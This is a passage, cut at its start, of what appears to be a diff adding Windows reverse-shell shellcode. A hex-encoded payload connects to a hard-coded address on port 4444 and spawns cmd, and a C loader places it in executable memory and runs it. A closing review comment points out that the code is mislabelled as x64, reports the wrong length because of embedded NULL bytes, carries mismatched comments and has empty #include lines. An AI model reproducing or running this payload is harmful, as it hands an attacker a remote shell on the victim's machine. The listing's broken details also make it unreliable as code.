+PUSH EDX ;pThreadAttributes => NULL +PUSH EDX ;pProcessAttributes => NULL +PUSH ECX ;pCommandLine => pointer to "cmd" +PUSH EDX ;ApplicationName => NULL +CALL EBP ;execute CreateProcessA + +*/ + +#include +#include +#include + +char code[] = +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b" +"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31" +"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f" +"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde" +"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53" +"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54" +"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33" +"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04" +"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68" 
+"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc" +"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c" +"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68" +"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06" +"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b" +"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63" +"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c" +"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83" +"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61" +"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72" +"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64" +"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57" +"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52" +"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50" +"\x52\x52\x51\x52\xff\xd5"; + +int main(int argc, char** argv) +{ + //HWND hWnd = GetConsoleWindow(); + //ShowWindow(hWnd, SW_HIDE); + printf("Shellcode Length: %d\n", strlen(code)); + void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(exec, code, sizeof(code)); + ((void(*)())exec)(); + + return 0; +} \ No newline at end of file
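Review bot: The title and the header claim "Windows/x64", but the listing is assembled with `[BITS 32]`, uses 32-bit registers throughout and reads the PEB via `FS:[ecx + 0x30]`, so this is x86 shellcode that can only run inside a 32-bit (WOW64) process on the tested x64 build; the title and "Tested on" line should say so. The "330 Bytes" figure is also an artifact rather than the real size: the `CreateProcessA` name-building line uses `SUB dword [ESP + 0x2], 0x6161` where every other name uses `SUB word`, which encodes as `\x81\x6c\x24\x02\x61\x61\x00\x00` and puts two NULL bytes into `code[]`; `strlen(code)` in `main()` stops exactly there at byte 330, while the array is 420 bytes long, so `VirtualAlloc(0, strlen(code), ...)` is sized from a truncated count and `memcpy(exec, code, sizeof(code))` copies the full array, and the printed "Shellcode Length" is wrong. A few comments disagree with the instructions they annotate and should be corrected: `MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)` names the wrong register; `ADD AL, 44 ;cb => 0x44 (size of struct)` assembles to decimal 44 (`\x04\x2c`), whereas `sizeof(STARTUPINFOA)` is 0x44 (68); `POP EDI ;load previously saved ws2_32.dll address to ECX` pops into EDI. Finally, the three `#include` lines in the C harness carry no header names, so the file does not compile as published.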